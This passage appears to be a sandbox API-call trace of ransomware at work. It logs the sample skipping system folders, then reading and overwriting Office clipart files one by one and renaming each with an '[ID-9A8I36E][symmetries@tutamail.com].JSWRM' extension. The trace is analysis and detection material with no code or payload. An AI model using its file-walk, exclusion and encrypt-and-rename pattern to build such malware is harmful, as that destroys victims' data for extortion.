dwFlags=0x0, lpWideCharStr="NA02431_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02431_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02431_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02431_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02431_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.567] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7212) returned 1 [0092.567] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c20) returned 0x205850 [0092.567] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c20, lpOverlapped=0x0) returned 1 [0092.569] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.569] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c20, lpOverlapped=0x0) returned 1 [0092.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.569] CloseHandle (hObject=0x314) returned 1 [0092.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0092.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0092.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0092.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0092.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0092.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0092.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02431_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02431_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0092.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0092.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.571] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xff8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02435_.WMF", cAlternateFileName="")) returned 1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2=".") returned 1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="..") returned 1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="...") returned 1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="windows") returned -1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="recovery") returned -1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="perflogs") returned -1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="documents and settings") returned 1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="system volume information") returned -1 [0092.571] lstrcmpiW (lpString1="NA02435_.WMF", lpString2="msocache") returned 1 [0092.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02435_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02435_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02435_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0092.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02435_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02435_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02435_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0092.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.572] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4088) returned 1 [0092.572] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xff0) returned 0x23fc98 [0092.572] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xff0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xff0, lpOverlapped=0x0) returned 1 [0092.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.574] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xff0, lpOverlapped=0x0) returned 1 [0092.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.574] CloseHandle (hObject=0x314) returned 1 [0092.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0092.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0092.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0092.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0092.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0092.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.575] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02435_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02435_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0092.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.576] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1434, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02439_.WMF", cAlternateFileName="")) returned 1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2=".") returned 1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="..") returned 1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="...") returned 1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="windows") returned -1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="recovery") returned -1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="perflogs") returned -1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="documents and settings") returned 1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="system volume information") returned -1 [0092.576] lstrcmpiW (lpString1="NA02439_.WMF", lpString2="msocache") returned 1 [0092.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0092.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02439_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02439_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02439_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0092.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02439_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02439_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02439_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0092.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.577] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5172) returned 1 [0092.577] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1430) returned 0x205850 [0092.577] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1430, lpOverlapped=0x0) returned 1 [0092.579] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.579] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1430, lpOverlapped=0x0) returned 1 [0092.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.579] CloseHandle (hObject=0x314) returned 1 [0092.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0092.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0092.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0092.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0092.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0092.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0092.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.580] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02439_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02439_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0092.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0092.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.581] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3218, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02441_.WMF", cAlternateFileName="")) returned 1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2=".") returned 1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="..") returned 1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="...") returned 1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="windows") returned -1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="recovery") returned -1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="perflogs") returned -1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="documents and settings") returned 1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="system volume information") returned -1 [0092.581] lstrcmpiW (lpString1="NA02441_.WMF", lpString2="msocache") returned 1 [0092.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0092.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02441_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02441_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02441_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0092.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02441_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02441_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02441_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0092.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0092.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02441_.WMF" 